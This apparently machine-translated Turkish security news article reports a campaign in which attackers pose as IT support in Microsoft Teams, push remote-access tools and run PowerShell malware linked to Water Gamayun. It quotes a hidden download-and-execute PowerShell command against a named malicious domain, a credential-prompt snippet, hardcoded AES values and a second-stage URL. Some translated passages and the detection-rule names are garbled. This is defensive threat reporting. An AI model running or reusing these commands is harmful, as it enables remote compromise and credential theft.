Kurumsal güvenlik için bir gelişmede, siber suçlular, PowerShell tabanlı kötü amaçlı yazılımlar sunmak ve Windows sistemlerine yetkisiz uzaktan erişim elde etmek için bir dahili mesajlaşma ve işbirliği aracı olarak güvenilir olan Microsoft ekiplerinden yararlanmaya başladı.
BT destek personelini taklit ederek ve sosyal mühendislikten yararlanarak, bu tehdit aktörleri geleneksel e-posta filtrelerini ve ağ savunmalarını atlar ve günlük işbirliği platformlarında doğrudan derin oturmuş kullanıcı güvenine çarparlar.
2017’deki lansmanından bu yana, Microsoft Teams dünya çapında kuruluşlar için vazgeçilmez hale geldi, sohbet, toplantılar, dosya paylaşımı ve daha fazlasını gerçekleştirdi.
Tehdit aktörleri artık yeni takım kiracılarını yaratarak veya “IT Destek”, “Yardım Masası” kisvesi altında ses veya sohbet oturumları veya meşruiyeti iletmek için onaylama emojisi ile süslenmiş özel isimler altında ses veya sohbet oturumları başlatarak takımların her yerde bulunuyor.
Bu hesaplar genellikle Microsoft’un Onmicrosoft.com alan adına ve “Yönetici” veya “DestekBotit” gibi jenerik öneklere, otomatik veya toplu hesap oluşturma sinyaline dayanır.
Bir takım oturumu kabul edildikten sonra – genellikle rutin bir performans kontrolü veya bakım çağrısı olarak çerçevelenmiş – saldırgan kurbanı QuickAssist veya Anydesk gibi uzaktan erişim araçlarını kurmaya yönlendirir.
Bu meşru kamu hizmetleri aracılığıyla, düşman daha sonra uç noktanın kontrolünü ele geçirir. Bir takım takibinden önce toplu e-posta patlamalarıyla başlayan Blackbasta Fidye Yazılımıyla bağlantılı önceki kampanyaların aksine, bazı son saldırılar e-postayı tamamen atlıyor ve doğrudan ekipler aracılığıyla başlatıyor. Bu varyasyonlar birden fazla aktör grubu veya gelişen taktikler önermektedir.
Uzaktan kumanda kurulduktan sonra, saldırganlar bir komut aracılığıyla teslim edilen bir PowerShell yükü yürütür:
powershellpowershell.exe -ExecutionPolicy Bypass -WindowsStyle Hidden -Command "Invoke-RestMethod -Uri https://audiorealteak.com/payload/build.ps1/iex"
Bu çok aşamalı senaryo, kimlik hırsızlığı, kalıcılık, sistem keşif ve uzaktan kod yürütme sağlar.
Komut dosyasının başlarında, benzersiz sert kodlanmış AES parametreleri-$iv = "&9*zS7LY%ZN1thfI" Ve $key = "123456789012345678901234r0hollah"-Savunucuları araştırmaları döndürmeye ve Water Gamayun veya Larva-208 olarak da bilinen finansal olarak motive olmuş şifreleme grubuna atfedilen önceki komut dosyalarına bağlantı vermeye.
OSINT raporlama bu grubu CVE-2025-26633 (MSC Eviltwin) ve SilentPrism ve DarkWisp dahil olmak üzere ısmarlama kötü amaçlı yazılım ailelerinin sıfır gün sömürüsüne bağlar.
Yürütme üzerine, kötü amaçlı yazılım, küresel bir muteks yoluyla tek bir işlem işlemini uygular:
powershell$AppId = "62088a7b-ae9f-2333-77a-6e9c921cb48e"
$script:SingleInstanceEvent = New-Object Threading.EventWaitHandle $true, …
Daha sonra çağırmak için c# derler ve enjekte eder RtlSetProcessIsCritical Ntdll.dll’den, PowerShell sürecini kritik olarak işaretlemek, böylece sonlandırma bir sistem çöküşünü tetikleyerek olay tepkisini karmaşıklaştırır.
A SystemInfo Fonksiyon, ana bilgisayar ayrıntılarını toplar – kamuya açık IP, donanım UUID, işletim sistemi verileri – JSON olarak formatlar, AES ile şifreler ve saldırganın C2 uç noktasına eksfiltrat yapar.
Kimlik Hırsızlığı için, komut dosyası yerel bir Windows kimlik bilgisi istemi çağırır:
powershell$D = $Host.UI.PromptForCredential("Need credentials", …)
Windows kullanıcı arayüzü ile bu kesintisiz entegrasyon kullanıcı şüphesini azaltır. Alınan kimlik bilgileri kaydedilir info.txt Kullanıcının AppData dizini altında.
Kalıcılık, önce girişte yükü çalıştırmak için “Google LLC Updater” adlı planlanmış bir görev kaydetmeye çalışarak elde edilir, ardından görev kaydı başarısız olursa bir kayıt defteri çalıştırma tuşuna geri döner.
Her iki yöntem de bir sonraki aşamalı komut dosyasını bir yedek alandan alır (https://cjhsbam[.]com/payload/runner.ps1), yayından kaldırma girişimlerine karşı direnç sağlama.
Tüm C2 iletişimleri, sert kodlanmış AES anahtarı ve IV kullanılarak şifrelenir. https://audiorealtek[.]com/PowerShell işleri olarak şifrelenmiş ve yürütülmüş yanıtlar.
Permiso kullanan işletmeler, şüpheli ekiplerin etkileşimlerini tanımlamak için p0_m365_teams_chat_m365_teams_chat_created_by_suspious_external_user_1 ve p0_m365_teams_chat_mander_namame_suspious_chat_member_namam_suspious_character_1
Tehdit aktörleri işbirliği platformlarına dönmeye devam ettikçe, kuruluşlar harici sohbetler ve sesli çağrılar etrafındaki güvenlik farkındalığını güçlendirmeli, katı kiracı-lüks/blok listelerini zorlamalı ve Microsoft ekiplerindeki anormal hesap kreasyonlarını izlemelidir.
Sert kodlanmış kriptografik artefaktların proaktif tespiti ve PowerShell komut dosyalarındaki olağandışı süreç korumaları, bu gelişen sosyal mühendislik tehditlerinin önemli erken uyarılarını sağlayabilir.
Bu hikayeyi ilginç bul! Daha fazla güncelleme almak için bizi LinkedIn ve X’te takip edin.